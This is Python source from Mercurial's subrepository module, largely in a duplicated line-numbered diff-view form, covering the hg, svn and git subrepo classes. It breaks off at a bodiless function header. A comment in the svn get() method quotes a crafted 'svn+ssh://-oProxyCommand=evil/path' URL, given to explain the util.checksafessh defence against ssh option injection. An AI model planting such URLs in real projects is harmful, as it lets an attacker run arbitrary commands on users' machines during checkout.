962 opts.pop('branch', None)
963 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
963 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
964
964
965 @annotatesubrepoerror
965 @annotatesubrepoerror
966 def incoming(self, ui, source, opts):
966 def incoming(self, ui, source, opts):
967 if 'rev' in opts or 'branch' in opts:
967 if 'rev' in opts or 'branch' in opts:
968 opts = copy.copy(opts)
968 opts = copy.copy(opts)
969 opts.pop('rev', None)
969 opts.pop('rev', None)
970 opts.pop('branch', None)
970 opts.pop('branch', None)
971 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
971 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
972
972
973 @annotatesubrepoerror
973 @annotatesubrepoerror
974 def files(self):
974 def files(self):
975 rev = self._state[1]
975 rev = self._state[1]
976 ctx = self._repo[rev]
976 ctx = self._repo[rev]
977 return ctx.manifest().keys()
977 return ctx.manifest().keys()
978
978
979 def filedata(self, name, decode):
979 def filedata(self, name, decode):
980 rev = self._state[1]
980 rev = self._state[1]
981 data = self._repo[rev][name].data()
981 data = self._repo[rev][name].data()
982 if decode:
982 if decode:
983 data = self._repo.wwritedata(name, data)
983 data = self._repo.wwritedata(name, data)
984 return data
984 return data
985
985
986 def fileflags(self, name):
986 def fileflags(self, name):
987 rev = self._state[1]
987 rev = self._state[1]
988 ctx = self._repo[rev]
988 ctx = self._repo[rev]
989 return ctx.flags(name)
989 return ctx.flags(name)
990
990
991 @annotatesubrepoerror
991 @annotatesubrepoerror
992 def printfiles(self, ui, m, fm, fmt, subrepos):
992 def printfiles(self, ui, m, fm, fmt, subrepos):
993 # If the parent context is a workingctx, use the workingctx here for
993 # If the parent context is a workingctx, use the workingctx here for
994 # consistency.
994 # consistency.
995 if self._ctx.rev() is None:
995 if self._ctx.rev() is None:
996 ctx = self._repo[None]
996 ctx = self._repo[None]
997 else:
997 else:
998 rev = self._state[1]
998 rev = self._state[1]
999 ctx = self._repo[rev]
999 ctx = self._repo[rev]
1000 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1000 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1001
1001
1002 @annotatesubrepoerror
1002 @annotatesubrepoerror
1003 def getfileset(self, expr):
1003 def getfileset(self, expr):
1004 if self._ctx.rev() is None:
1004 if self._ctx.rev() is None:
1005 ctx = self._repo[None]
1005 ctx = self._repo[None]
1006 else:
1006 else:
1007 rev = self._state[1]
1007 rev = self._state[1]
1008 ctx = self._repo[rev]
1008 ctx = self._repo[rev]
1009
1009
1010 files = ctx.getfileset(expr)
1010 files = ctx.getfileset(expr)
1011
1011
1012 for subpath in ctx.substate:
1012 for subpath in ctx.substate:
1013 sub = ctx.sub(subpath)
1013 sub = ctx.sub(subpath)
1014
1014
1015 try:
1015 try:
1016 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1016 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1017 except error.LookupError:
1017 except error.LookupError:
1018 self.ui.status(_("skipping missing subrepository: %s\n")
1018 self.ui.status(_("skipping missing subrepository: %s\n")
1019 % self.wvfs.reljoin(reporelpath(self), subpath))
1019 % self.wvfs.reljoin(reporelpath(self), subpath))
1020 return files
1020 return files
1021
1021
1022 def walk(self, match):
1022 def walk(self, match):
1023 ctx = self._repo[None]
1023 ctx = self._repo[None]
1024 return ctx.walk(match)
1024 return ctx.walk(match)
1025
1025
1026 @annotatesubrepoerror
1026 @annotatesubrepoerror
1027 def forget(self, match, prefix):
1027 def forget(self, match, prefix):
1028 return cmdutil.forget(self.ui, self._repo, match,
1028 return cmdutil.forget(self.ui, self._repo, match,
1029 self.wvfs.reljoin(prefix, self._path), True)
1029 self.wvfs.reljoin(prefix, self._path), True)
1030
1030
1031 @annotatesubrepoerror
1031 @annotatesubrepoerror
1032 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1032 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1033 return cmdutil.remove(self.ui, self._repo, matcher,
1033 return cmdutil.remove(self.ui, self._repo, matcher,
1034 self.wvfs.reljoin(prefix, self._path),
1034 self.wvfs.reljoin(prefix, self._path),
1035 after, force, subrepos)
1035 after, force, subrepos)
1036
1036
    @annotatesubrepoerror
    def revert(self, substate, *pats, **opts):
        # reverting a subrepo is a two-step process:
        # 1. if no_backup is not set, revert all modified
        #    files inside the subrepo
        # 2. update the subrepo to the revision specified in
        #    the corresponding substate dictionary
        self.ui.status(_('reverting subrepo %s\n') % substate[0])
        if not opts.get('no_backup'):
            # Revert all files on the subrepo, creating backups
            # Note that this will not recursively revert subrepos
            # We could do it if there was a set:subrepos() predicate
            opts = opts.copy()
            opts['date'] = None
            opts['rev'] = substate[1]

            self.filerevert(*pats, **opts)

        # Update the repo to the revision specified in the given substate
        if not opts.get('dry_run'):
            self.get(substate, overwrite=True)

    def filerevert(self, *pats, **opts):
        ctx = self._repo[opts['rev']]
        parents = self._repo.dirstate.parents()
        if opts.get('all'):
            pats = ['set:modified()']
        else:
            pats = []
        cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)

    def shortid(self, revid):
        return revid[:12]

    def verify(self):
        try:
            rev = self._state[1]
            ctx = self._repo.unfiltered()[rev]
            if ctx.hidden():
                # Since hidden revisions aren't pushed/pulled, it seems worth an
                # explicit warning.
                ui = self._repo.ui
                ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
                        (self._relpath, node.short(self._ctx.node())))
            return 0
        except error.RepoLookupError:
            # A missing subrepo revision may be a case of needing to pull it, so
            # don't treat this as an error.
            self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
                               (self._relpath, node.short(self._ctx.node())))
            return 0

    @propertycache
    def wvfs(self):
        """return own wvfs for efficiency and consistency
        """
        return self._repo.wvfs

    @propertycache
    def _relpath(self):
        """return path to this subrepository as seen from outermost repository
        """
        # Keep consistent dir separators by avoiding vfs.join(self._path)
        return reporelpath(self._repo)

class svnsubrepo(abstractsubrepo):
    def __init__(self, ctx, path, state, allowcreate):
        super(svnsubrepo, self).__init__(ctx, path)
        self._state = state
        self._exe = util.findexe('svn')
        if not self._exe:
            raise error.Abort(_("'svn' executable not found for subrepo '%s'")
                              % self._path)

    def _svncommand(self, commands, filename='', failok=False):
        cmd = [self._exe]
        extrakw = {}
        if not self.ui.interactive():
            # Making stdin be a pipe should prevent svn from behaving
            # interactively even if we can't pass --non-interactive.
            extrakw['stdin'] = subprocess.PIPE
            # Starting in svn 1.5 --non-interactive is a global flag
            # instead of being per-command, but we need to support 1.4 so
            # we have to be intelligent about what commands take
            # --non-interactive.
            if commands[0] in ('update', 'checkout', 'commit'):
                cmd.append('--non-interactive')
        cmd.extend(commands)
        if filename is not None:
            path = self.wvfs.reljoin(self._ctx.repo().origroot,
                                     self._path, filename)
            cmd.append(path)
        env = dict(encoding.environ)
        # Avoid localized output, preserve current locale for everything else.
        lc_all = env.get('LC_ALL')
        if lc_all:
            env['LANG'] = lc_all
            del env['LC_ALL']
        env['LC_MESSAGES'] = 'C'
        p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             universal_newlines=True, env=env, **extrakw)
        stdout, stderr = p.communicate()
        stderr = stderr.strip()
        if not failok:
            if p.returncode:
                raise error.Abort(stderr or 'exited with code %d'
                                  % p.returncode)
            if stderr:
                self.ui.warn(stderr + '\n')
        return stdout, stderr

    @propertycache
    def _svnversion(self):
        output, err = self._svncommand(['--version', '--quiet'], filename=None)
        m = re.search(r'^(\d+)\.(\d+)', output)
        if not m:
            raise error.Abort(_('cannot retrieve svn tool version'))
        return (int(m.group(1)), int(m.group(2)))

    def _wcrevs(self):
        # Get the working directory revision as well as the last
        # commit revision so we can compare the subrepo state with
        # both. We used to store the working directory one.
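        # For reference, `svn info --xml` reports both numbers roughly as
        # follows (abridged, illustrative output):
        #   <entry revision="42" ...><commit revision="40" .../></entry>
        # entry/@revision is the working copy revision; commit/@revision is
        # the last-changed revision.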
        output, err = self._svncommand(['info', '--xml'])
        doc = xml.dom.minidom.parseString(output)
        entries = doc.getElementsByTagName('entry')
        lastrev, rev = '0', '0'
        if entries:
            rev = str(entries[0].getAttribute('revision')) or '0'
            commits = entries[0].getElementsByTagName('commit')
            if commits:
                lastrev = str(commits[0].getAttribute('revision')) or '0'
        return (lastrev, rev)

    def _wcrev(self):
        return self._wcrevs()[0]

    def _wcchanged(self):
        """Return (changes, extchanges, missing) where changes is True
        if the working directory was changed, extchanges is
        True if any of these changes concern an external entry and missing
        is True if any change is a missing entry.
        """
        output, err = self._svncommand(['status', '--xml'])
        externals, changes, missing = [], [], []
        doc = xml.dom.minidom.parseString(output)
        for e in doc.getElementsByTagName('entry'):
            s = e.getElementsByTagName('wc-status')
            if not s:
                continue
            item = s[0].getAttribute('item')
            props = s[0].getAttribute('props')
            path = e.getAttribute('path')
            if item == 'external':
                externals.append(path)
            elif item == 'missing':
                missing.append(path)
            if (item not in ('', 'normal', 'unversioned', 'external')
                or props not in ('', 'none', 'normal')):
                changes.append(path)
        for path in changes:
            for ext in externals:
                if path == ext or path.startswith(ext + pycompat.ossep):
                    return True, True, bool(missing)
        return bool(changes), False, bool(missing)

    def dirty(self, ignoreupdate=False):
        if not self._wcchanged()[0]:
            if self._state[1] in self._wcrevs() or ignoreupdate:
                return False
        return True

    def basestate(self):
        lastrev, rev = self._wcrevs()
        if lastrev != rev:
            # The last committed rev is not the same as rev. We would
            # like to take lastrev, but we do not know if the subrepo
            # URL exists at lastrev. Test it and fall back to rev if
            # it is not there.
            try:
                self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
                return lastrev
            except error.Abort:
                pass
        return rev

    @annotatesubrepoerror
    def commit(self, text, user, date):
        # user and date are out of our hands since svn is centralized
        changed, extchanged, missing = self._wcchanged()
        if not changed:
            return self.basestate()
        if extchanged:
            # Do not try to commit externals
            raise error.Abort(_('cannot commit svn externals'))
        if missing:
            # svn can commit with missing entries but aborting like hg
            # seems a better approach.
            raise error.Abort(_('cannot commit missing svn entries'))
        commitinfo, err = self._svncommand(['commit', '-m', text])
        self.ui.status(commitinfo)
        newrev = re.search('Committed revision ([0-9]+).', commitinfo)
        if not newrev:
            if not commitinfo.strip():
                # Sometimes, our definition of "changed" differs from
                # svn's. For instance, svn ignores missing files
                # when committing. If there are only missing files, no
                # commit is made, no output and no error code.
                raise error.Abort(_('failed to commit svn changes'))
            raise error.Abort(commitinfo.splitlines()[-1])
        newrev = newrev.groups()[0]
        self.ui.status(self._svncommand(['update', '-r', newrev])[0])
        return newrev

    @annotatesubrepoerror
    def remove(self):
        if self.dirty():
            self.ui.warn(_('not removing repo %s because '
                           'it has changes.\n') % self._path)
            return
        self.ui.note(_('removing subrepo %s\n') % self._path)

        self.wvfs.rmtree(forcibly=True)
        try:
            pwvfs = self._ctx.repo().wvfs
            pwvfs.removedirs(pwvfs.dirname(self._path))
        except OSError:
            pass

    @annotatesubrepoerror
    def get(self, state, overwrite=False):
        if overwrite:
            self._svncommand(['revert', '--recursive'])
        args = ['checkout']
        if self._svnversion >= (1, 5):
            args.append('--force')
        # The revision must be specified at the end of the URL to properly
        # update to a directory which has since been deleted and recreated.
        args.append('%s@%s' % (state[0], state[1]))

        # SEC: check that the ssh url is safe
        util.checksafessh(state[0])
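        # The check above guards against option injection through rogue ssh
        # urls: a crafted subrepo source such as
        # 'svn+ssh://-oProxyCommand=evil/path' (hypothetical example) would
        # otherwise hand '-oProxyCommand=...' to ssh as an option instead of
        # a host name, running an arbitrary command on checkout;
        # util.checksafessh aborts on such urls.
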
        status, err = self._svncommand(args, failok=True)
        _sanitize(self.ui, self.wvfs, '.svn')
        if not re.search('Checked out revision [0-9]+.', status):
            if ('is already a working copy for a different URL' in err
                and (self._wcchanged()[:2] == (False, False))):
                # obstructed but clean working copy, so just blow it away.
                self.remove()
                self.get(state, overwrite=False)
                return
            raise error.Abort((status or err).splitlines()[-1])
        self.ui.status(status)

    @annotatesubrepoerror
    def merge(self, state):
        old = self._state[1]
        new = state[1]
        wcrev = self._wcrev()
        if new != wcrev:
            dirty = old == wcrev or self._wcchanged()[0]
            if _updateprompt(self.ui, self, dirty, wcrev, new):
                self.get(state, False)

    def push(self, opts):
        # push is a no-op for SVN
        return True

    @annotatesubrepoerror
    def files(self):
        output = self._svncommand(['list', '--recursive', '--xml'])[0]
        doc = xml.dom.minidom.parseString(output)
        paths = []
        for e in doc.getElementsByTagName('entry'):
            kind = str(e.getAttribute('kind'))
            if kind != 'file':
                continue
            name = ''.join(c.data for c
                           in e.getElementsByTagName('name')[0].childNodes
                           if c.nodeType == c.TEXT_NODE)
            paths.append(name.encode('utf-8'))
        return paths

    def filedata(self, name, decode):
        return self._svncommand(['cat'], name)[0]


class gitsubrepo(abstractsubrepo):
    def __init__(self, ctx, path, state, allowcreate):
        super(gitsubrepo, self).__init__(ctx, path)
        self._state = state
        self._abspath = ctx.repo().wjoin(path)
        self._subparent = ctx.repo()
        self._ensuregit()

    def _ensuregit(self):
        try:
            self._gitexecutable = 'git'
            out, err = self._gitnodir(['--version'])
        except OSError as e:
            genericerror = _("error executing git for subrepo '%s': %s")
            notfoundhint = _("check git is installed and in your PATH")
            if e.errno != errno.ENOENT:
                raise error.Abort(genericerror % (self._path, e.strerror))
            elif pycompat.osname == 'nt':
                try:
                    self._gitexecutable = 'git.cmd'
                    out, err = self._gitnodir(['--version'])
                except OSError as e2:
                    if e2.errno == errno.ENOENT:
                        raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
                                            " for subrepo '%s'") % self._path,
                                          hint=notfoundhint)
                    else:
                        raise error.Abort(genericerror % (self._path,
                                                          e2.strerror))
            else:
                raise error.Abort(_("couldn't find git for subrepo '%s'")
                                  % self._path, hint=notfoundhint)
        versionstatus = self._checkversion(out)
        if versionstatus == 'unknown':
            self.ui.warn(_('cannot retrieve git version\n'))
        elif versionstatus == 'abort':
            raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
        elif versionstatus == 'warning':
            self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))

    @staticmethod
    def _gitversion(out):
        m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
        if m:
            return (int(m.group(1)), int(m.group(2)), int(m.group(3)))

        m = re.search(r'^git version (\d+)\.(\d+)', out)
        if m:
            return (int(m.group(1)), int(m.group(2)), 0)

        return -1

    @staticmethod
    def _checkversion(out):
        '''ensure git version is new enough

        >>> _checkversion = gitsubrepo._checkversion
        >>> _checkversion('git version 1.6.0')
        'ok'
        >>> _checkversion('git version 1.8.5')
        'ok'
        >>> _checkversion('git version 1.4.0')
        'abort'
        >>> _checkversion('git version 1.5.0')
        'warning'
        >>> _checkversion('git version 1.9-rc0')
        'ok'
        >>> _checkversion('git version 1.9.0.265.g81cdec2')
        'ok'
        >>> _checkversion('git version 1.9.0.GIT')
        'ok'
        >>> _checkversion('git version 12345')
        'unknown'
        >>> _checkversion('no')
        'unknown'
        '''
        version = gitsubrepo._gitversion(out)
        # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
        # despite the docstring comment. For now, error on 1.4.0, warn on
        # 1.5.0 but attempt to continue.
        if version == -1:
            return 'unknown'
        if version < (1, 5, 0):
            return 'abort'
        elif version < (1, 6, 0):
            return 'warning'
        return 'ok'

    def _gitcommand(self, commands, env=None, stream=False):
        return self._gitdir(commands, env=env, stream=stream)[0]

    def _gitdir(self, commands, env=None, stream=False):
        return self._gitnodir(commands, env=env, stream=stream,
                              cwd=self._abspath)

    def _gitnodir(self, commands, env=None, stream=False, cwd=None):
        """Calls the git command

        The method tries to call the git command. Versions prior to 1.6.0
        are not supported and will very probably fail.
        """
        self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
        if env is None:
            env = encoding.environ.copy()
        # disable localization for Git output (issue5176)
        env['LC_ALL'] = 'C'
        # fix for Git CVE-2015-7545
        if 'GIT_ALLOW_PROTOCOL' not in env:
            env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
        # unless ui.quiet is set, print git's stderr,
        # which is mostly progress and useful info
        errpipe = None
        if self.ui.quiet:
            errpipe = open(os.devnull, 'w')
        if self.ui._colormode and len(commands) and commands[0] == "diff":
            # insert the argument in the front,
            # the end of git diff arguments is used for paths
            commands.insert(1, '--color')
        p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
                             cwd=cwd, env=env, close_fds=util.closefds,
                             stdout=subprocess.PIPE, stderr=errpipe)
        if stream:
            return p.stdout, None

        retdata = p.stdout.read().strip()
        # wait for the child to exit to avoid race condition.
        p.wait()

        if p.returncode != 0 and p.returncode != 1:
            # there are certain error codes that are ok
            command = commands[0]
            if command in ('cat-file', 'symbolic-ref'):
                return retdata, p.returncode
            # for all others, abort
            raise error.Abort(_('git %s error %d in %s') %
                              (command, p.returncode, self._relpath))

        return retdata, p.returncode

    def _gitmissing(self):
        return not self.wvfs.exists('.git')

    def _gitstate(self):
        return self._gitcommand(['rev-parse', 'HEAD'])

    def _gitcurrentbranch(self):
        current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
        if err:
            current = None
        return current

    def _gitremote(self, remote):
        out = self._gitcommand(['remote', 'show', '-n', remote])
        line = out.split('\n')[1]
        i = line.index('URL: ') + len('URL: ')
        return line[i:]

    def _githavelocally(self, revision):
        out, code = self._gitdir(['cat-file', '-e', revision])
        return code == 0

    def _gitisancestor(self, r1, r2):
        base = self._gitcommand(['merge-base', r1, r2])
        return base == r1

    def _gitisbare(self):
        return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'

    def _gitupdatestat(self):
        """This must be run before git diff-index.
        diff-index only looks at changes to file stat;
        this command looks at file contents and updates the stat."""
        self._gitcommand(['update-index', '-q', '--refresh'])

    def _gitbranchmap(self):
        '''returns 2 things:
        a map from git branch to revision
        a map from revision to branches'''
        branch2rev = {}
        rev2branch = {}

        out = self._gitcommand(['for-each-ref', '--format',
                                '%(objectname) %(refname)'])
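        # each output line has the form '<40-hex object name> <refname>',
        # e.g. 'deadbeef... refs/remotes/origin/master' (illustrative)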
        for line in out.split('\n'):
            revision, ref = line.split(' ')
            if (not ref.startswith('refs/heads/') and
                not ref.startswith('refs/remotes/')):
                continue
            if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
                continue # ignore remote/HEAD redirects
            branch2rev[ref] = revision
            rev2branch.setdefault(revision, []).append(ref)
        return branch2rev, rev2branch

    def _gittracking(self, branches):
        'return map of remote branch to local tracking branch'
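        # e.g. {'refs/remotes/origin/master': 'refs/heads/master'} for a
        # default clone (illustrative)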
        # assumes no more than one local tracking branch for each remote
        tracking = {}
        for b in branches:
            if b.startswith('refs/remotes/'):
                continue
            bname = b.split('/', 2)[2]
            remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
            if remote:
                ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
                tracking['refs/remotes/%s/%s' %
                         (remote, ref.split('/', 2)[2])] = b
        return tracking

    def _abssource(self, source):
        if '://' not in source:
            # recognize the scp syntax as an absolute source
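            # (e.g. 'git@host.example:repo.git' -- a colon appearing before
            # any slash marks scp-style syntax, which is returned unchanged)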
            colon = source.find(':')
            if colon != -1 and '/' not in source[:colon]:
                return source
        self._subsource = source
        return _abssource(self)

    def _fetch(self, source, revision):
        if self._gitmissing():
            source = self._abssource(source)
            self.ui.status(_('cloning subrepo %s from %s\n') %
                           (self._relpath, source))
            self._gitnodir(['clone', source, self._abspath])
        if self._githavelocally(revision):
            return
        self.ui.status(_('pulling subrepo %s from %s\n') %
                       (self._relpath, self._gitremote('origin')))
        # try only origin: the originally cloned repo
        self._gitcommand(['fetch'])
        if not self._githavelocally(revision):
            raise error.Abort(_("revision %s does not exist in subrepo %s\n") %
                              (revision, self._relpath))

    @annotatesubrepoerror
    def dirty(self, ignoreupdate=False):
        if self._gitmissing():
            return self._state[1] != ''
        if self._gitisbare():
            return True
        if not ignoreupdate and self._state[1] != self._gitstate():
            # different version checked out
            return True
        # check for staged changes or modified files; ignore untracked files
        self._gitupdatestat()
        out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
        return code == 1

    def basestate(self):
        return self._gitstate()

    @annotatesubrepoerror
    def get(self, state, overwrite=False):
        source, revision, kind = state
        if not revision:
            self.remove()
            return
        self._fetch(source, revision)
        # if the repo was set to be bare, unbare it
        if self._gitisbare():
            self._gitcommand(['config', 'core.bare', 'false'])
            if self._gitstate() == revision:
                self._gitcommand(['reset', '--hard', 'HEAD'])
                return
        elif self._gitstate() == revision:
            if overwrite:
                # first reset the index to unmark new files for commit, because
                # reset --hard will otherwise throw away files added for commit,
                # not just unmark them.
                self._gitcommand(['reset', 'HEAD'])
            self._gitcommand(['reset', '--hard', 'HEAD'])
            return
        branch2rev, rev2branch = self._gitbranchmap()

        def checkout(args):
            cmd = ['checkout']
            if overwrite:
                # first reset the index to unmark new files for commit, because
                # the -f option will otherwise throw away files added for
                # commit, not just unmark them.
                self._gitcommand(['reset', 'HEAD'])
                cmd.append('-f')
            self._gitcommand(cmd + args)
            _sanitize(self.ui, self.wvfs, '.git')

        def rawcheckout():
            # no branch to checkout, check it out with no branch
            self.ui.warn(_('checking out detached HEAD in subrepo %s\n') %
                         self._relpath)
            self.ui.warn(_('check out a git branch if you intend '
                           'to make changes\n'))
            checkout(['-q', revision])

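        # Checkout strategy, in order of preference: detach if no branch
        # points at the revision; prefer refs/heads/master; otherwise take
        # the first local branch; otherwise follow a tracked remote branch
        # (fast-forwarding its local tracking branch when it is an
        # ancestor); as a last resort, detach.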
1615 if revision not in rev2branch:
1619 if revision not in rev2branch:
1616 rawcheckout()
1620 rawcheckout()
1617 return
1621 return
1618 branches = rev2branch[revision]
1622 branches = rev2branch[revision]
1619 firstlocalbranch = None
1623 firstlocalbranch = None
1620 for b in branches:
1624 for b in branches:
1621 if b == 'refs/heads/master':
1625 if b == 'refs/heads/master':
1622 # master trumps all other branches
1626 # master trumps all other branches
1623 checkout(['refs/heads/master'])
1627 checkout(['refs/heads/master'])
1624 return
1628 return
1625 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1629 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1626 firstlocalbranch = b
1630 firstlocalbranch = b
1627 if firstlocalbranch:
1631 if firstlocalbranch:
1628 checkout([firstlocalbranch])
1632 checkout([firstlocalbranch])
1629 return
1633 return
1630
1634
1631 tracking = self._gittracking(branch2rev.keys())
1635 tracking = self._gittracking(branch2rev.keys())
1632 # choose a remote branch already tracked if possible
1636 # choose a remote branch already tracked if possible
1633 remote = branches[0]
1637 remote = branches[0]
1634 if remote not in tracking:
1638 if remote not in tracking:
1635 for b in branches:
1639 for b in branches:
1636 if b in tracking:
1640 if b in tracking:
1637 remote = b
1641 remote = b
1638 break
1642 break
1639
1643
1640 if remote not in tracking:
1644 if remote not in tracking:
1641 # create a new local tracking branch
1645 # create a new local tracking branch
1642 local = remote.split('/', 3)[3]
1646 local = remote.split('/', 3)[3]
1643 checkout(['-b', local, remote])
1647 checkout(['-b', local, remote])
1644 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1648 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1645 # When updating to a tracked remote branch,
1649 # When updating to a tracked remote branch,
1646 # if the local tracking branch is downstream of it,
1650 # if the local tracking branch is downstream of it,
1647 # a normal `git pull` would have performed a "fast-forward merge"
1651 # a normal `git pull` would have performed a "fast-forward merge"
1648 # which is equivalent to updating the local branch to the remote.
1652 # which is equivalent to updating the local branch to the remote.
1649 # Since we are only looking at branching at update, we need to
1653 # Since we are only looking at branching at update, we need to
1650 # detect this situation and perform this action lazily.
1654 # detect this situation and perform this action lazily.
1651 if tracking[remote] != self._gitcurrentbranch():
1655 if tracking[remote] != self._gitcurrentbranch():
1652 checkout([tracking[remote]])
1656 checkout([tracking[remote]])
1653 self._gitcommand(['merge', '--ff', remote])
1657 self._gitcommand(['merge', '--ff', remote])
1654 _sanitize(self.ui, self.wvfs, '.git')
1658 _sanitize(self.ui, self.wvfs, '.git')
1655 else:
1659 else:
1656 # a real merge would be required, just checkout the revision
1660 # a real merge would be required, just checkout the revision
1657 rawcheckout()
1661 rawcheckout()
1658
1662
1659 @annotatesubrepoerror
1663 @annotatesubrepoerror
1660 def commit(self, text, user, date):
1664 def commit(self, text, user, date):
1661 if self._gitmissing():
1665 if self._gitmissing():
1662 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1666 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1663 cmd = ['commit', '-a', '-m', text]
1667 cmd = ['commit', '-a', '-m', text]
1664 env = encoding.environ.copy()
1668 env = encoding.environ.copy()
1665 if user:
1669 if user:
1666 cmd += ['--author', user]
1670 cmd += ['--author', user]
1667 if date:
1671 if date:
1668 # git's date parser silently ignores when seconds < 1e9
1672 # git's date parser silently ignores when seconds < 1e9
1669 # convert to ISO8601
1673 # convert to ISO8601
1670 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1674 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1671 '%Y-%m-%dT%H:%M:%S %1%2')
1675 '%Y-%m-%dT%H:%M:%S %1%2')
1672 self._gitcommand(cmd, env=env)
1676 self._gitcommand(cmd, env=env)
1673 # make sure commit works otherwise HEAD might not exist under certain
1677 # make sure commit works otherwise HEAD might not exist under certain
1674 # circumstances
1678 # circumstances
1675 return self._gitstate()
1679 return self._gitstate()
1676
1680
1677 @annotatesubrepoerror
1681 @annotatesubrepoerror
1678 def merge(self, state):
1682 def merge(self, state):
1679 source, revision, kind = state
1683 source, revision, kind = state
1680 self._fetch(source, revision)
1684 self._fetch(source, revision)
1681 base = self._gitcommand(['merge-base', revision, self._state[1]])
1685 base = self._gitcommand(['merge-base', revision, self._state[1]])
1682 self._gitupdatestat()
1686 self._gitupdatestat()
1683 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1687 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1684
1688
1685 def mergefunc():
1689 def mergefunc():
1686 if base == revision:
1690 if base == revision:
1687 self.get(state) # fast forward merge
1691 self.get(state) # fast forward merge
1688 elif base != self._state[1]:
1692 elif base != self._state[1]:
1689 self._gitcommand(['merge', '--no-commit', revision])
1693 self._gitcommand(['merge', '--no-commit', revision])
1690 _sanitize(self.ui, self.wvfs, '.git')
1694 _sanitize(self.ui, self.wvfs, '.git')
1691
1695
1692 if self.dirty():
1696 if self.dirty():
1693 if self._gitstate() != revision:
1697 if self._gitstate() != revision:
1694 dirty = self._gitstate() == self._state[1] or code != 0
1698 dirty = self._gitstate() == self._state[1] or code != 0
1695 if _updateprompt(self.ui, self, dirty,
1699 if _updateprompt(self.ui, self, dirty,
1696 self._state[1][:7], revision[:7]):
1700 self._state[1][:7], revision[:7]):
1697 mergefunc()
1701 mergefunc()
1698 else:
1702 else:
1699 mergefunc()
1703 mergefunc()
1700
1704
1701 @annotatesubrepoerror
1705 @annotatesubrepoerror
1702 def push(self, opts):
1706 def push(self, opts):
1703 force = opts.get('force')
1707 force = opts.get('force')
1704
1708
1705 if not self._state[1]:
1709 if not self._state[1]:
1706 return True
1710 return True
1707 if self._gitmissing():
1711 if self._gitmissing():
1708 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1712 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1709 # if a branch in origin contains the revision, nothing to do
1713 # if a branch in origin contains the revision, nothing to do
1710 branch2rev, rev2branch = self._gitbranchmap()
1714 branch2rev, rev2branch = self._gitbranchmap()
1711 if self._state[1] in rev2branch:
1715 if self._state[1] in rev2branch:
1712 for b in rev2branch[self._state[1]]:
1716 for b in rev2branch[self._state[1]]:
1713 if b.startswith('refs/remotes/origin/'):
1717 if b.startswith('refs/remotes/origin/'):
1714 return True
1718 return True
1715 for b, revision in branch2rev.iteritems():
1719 for b, revision in branch2rev.iteritems():
1716 if b.startswith('refs/remotes/origin/'):
1720 if b.startswith('refs/remotes/origin/'):
1717 if self._gitisancestor(self._state[1], revision):
1721 if self._gitisancestor(self._state[1], revision):
1718 return True
1722 return True
1719 # otherwise, try to push the currently checked out branch
1723 # otherwise, try to push the currently checked out branch
1720 cmd = ['push']
1724 cmd = ['push']
1721 if force:
1725 if force:
1722 cmd.append('--force')
1726 cmd.append('--force')
1723
1727
1724 current = self._gitcurrentbranch()
1728 current = self._gitcurrentbranch()
1725 if current:
1729 if current:
1726 # determine if the current branch is even useful
1730 # determine if the current branch is even useful
1727 if not self._gitisancestor(self._state[1], current):
1731 if not self._gitisancestor(self._state[1], current):
1728 self.ui.warn(_('unrelated git branch checked out '
1732 self.ui.warn(_('unrelated git branch checked out '
1729 'in subrepo %s\n') % self._relpath)
1733 'in subrepo %s\n') % self._relpath)
1730 return False
1734 return False
1731 self.ui.status(_('pushing branch %s of subrepo %s\n') %
1735 self.ui.status(_('pushing branch %s of subrepo %s\n') %
1732 (current.split('/', 2)[2], self._relpath))
1736 (current.split('/', 2)[2], self._relpath))
1733 ret = self._gitdir(cmd + ['origin', current])
1737 ret = self._gitdir(cmd + ['origin', current])
1734 return ret[1] == 0
1738 return ret[1] == 0
1735 else:
1739 else:
1736 self.ui.warn(_('no branch checked out in subrepo %s\n'
1740 self.ui.warn(_('no branch checked out in subrepo %s\n'
1737 'cannot push revision %s\n') %
1741 'cannot push revision %s\n') %
1738 (self._relpath, self._state[1]))
1742 (self._relpath, self._state[1]))
1739 return False
1743 return False
1740
1744
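# Illustrative sketch (not the Mercurial API): the early returns in push()
# boil down to "is the revision already reachable from some origin branch?".
# branch2rev and isancestor are stand-ins for _gitbranchmap/_gitisancestor.

def needspush(revision, branch2rev, isancestor):
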